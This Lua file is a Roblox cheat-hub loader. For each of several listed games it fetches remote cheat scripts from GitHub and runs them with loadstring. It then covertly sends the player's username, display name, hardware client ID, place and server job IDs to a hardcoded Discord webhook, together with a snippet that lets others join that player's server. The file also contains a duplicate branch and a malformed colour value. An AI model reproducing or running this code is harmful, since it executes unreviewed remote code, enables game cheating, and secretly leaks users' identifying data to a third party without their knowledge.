if game.PlaceId == 7560156054 then

    loadstring(game:HttpGet(('https://raw.githubusercontent.com/Sashkotashko420/wowwowowow/main/ClickerSimulator')))()

elseif game.PlaceId == 9498006165 then
    loadstring(game:HttpGet('https://raw.githubusercontent.com/Sashkotashko420/wowwowowow/main/TappingSimulator'))()

elseif game.PlaceId == 2116452049 then

    loadstring(game:HttpGet('https://raw.githubusercontent.com/Sashkotashko420/wowwowowow/main/SteveOnePiece'))()

elseif game.PlaceId == 5852812686 then

    loadstring(game:HttpGet('https://raw.githubusercontent.com/Sashkotashko420/wowwowowow/main/CandyClickingSimulator'))()

elseif game.PlaceId == 8304191830 then

    loadstring(game:HttpGet('https://raw.githubusercontent.com/Sashkotashko420/wowwowowow/main/AnimeAdventures'))()

elseif game.PlaceId == 3956818381 then

    loadstring(game:HttpGet('https://raw.githubusercontent.com/Sashkotashko420/wowwowowow/main/NinjaLegends'))()

elseif game.PlaceId == 3956818381 then

    loadstring(game:HttpGet('https://raw.githubusercontent.com/borntodiekuv/Ninja/main/Legends'))()

elseif game.PlaceId == 8232438881 then

    loadstring(game:HttpGet('https://raw.githubusercontent.com/Sashkotashko420/wowwowowow/main/ThiefSimulator'))()

elseif game.PlaceId == 3823781113 then

    loadstring(game:HttpGet('https://raw.githubusercontent.com/Sashkotashko420/wowwowowow/main/SaberSimulator'))()
    
elseif game.PlaceId == 9976239895 then

	loadstring(game:HttpGet('https://raw.githubusercontent.com/Sashkotashko420/wowwowowow/main/GumballFactoryTycoon'))()

end

local Data = {
	["content"] = "***`someone used the lxst hub`***",
	["embeds"] = {{
		["author"] = {
			["name"] = name,
			["icon_url"] = "",
		},
		["description"] = " ",
		["color"] = f70505,
 
		["image"] = {
			['url'] = "https://cdn.discordapp.com/attachments/997644672707067965/997644861706612807/175117944-40a3c57e-1a34-49f2-8160-7f176bb2eb4c_2.png",
		},
 
        ["thumbnail"] = {
			['url'] = "",
		},
 
		["fields"] = {
			{
				["name"] = "Player",
				["value"] = "**"..game.Players.LocalPlayer.Name.."**\n**`@"..game.Players.LocalPlayer.DisplayName.."`**\n\n**HWID:** **`"..game:GetService("RbxAnalyticsService"):GetClientId().."`**\n\n**Using Premium:** **`No`**\n\n**Place Id:** **`"..game.placeId.."`**\n\n**Job Id:** **`"..game.jobId.."`**\n\n**Place Name:** **`"..game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name.."`**\n\n**`Join Player` Script**\n***```local TeleportService = game:service'TeleportService'\nTeleportService:TeleportToPlaceIstance('"..game.placeId..", "..game.jobId.."')```***",
				["inline"] = false
			}
		}
	}},
}
local response = http_request(
	{
		Url =  "https://discord.com/api/webhooks/997644691694694460/TbHaPEwRO1trFA4qOzhGpuRYHi-cGu1JvXkasQRMqL5ebr2AitoXt2OT3qJ1Bt7KTwGw",
		Method = 'POST',
		Headers = {
			['Content-Type'] = 'application/json'
		},
        Body = game:GetService('HttpService'):JSONEncode(Data)
	} 
);

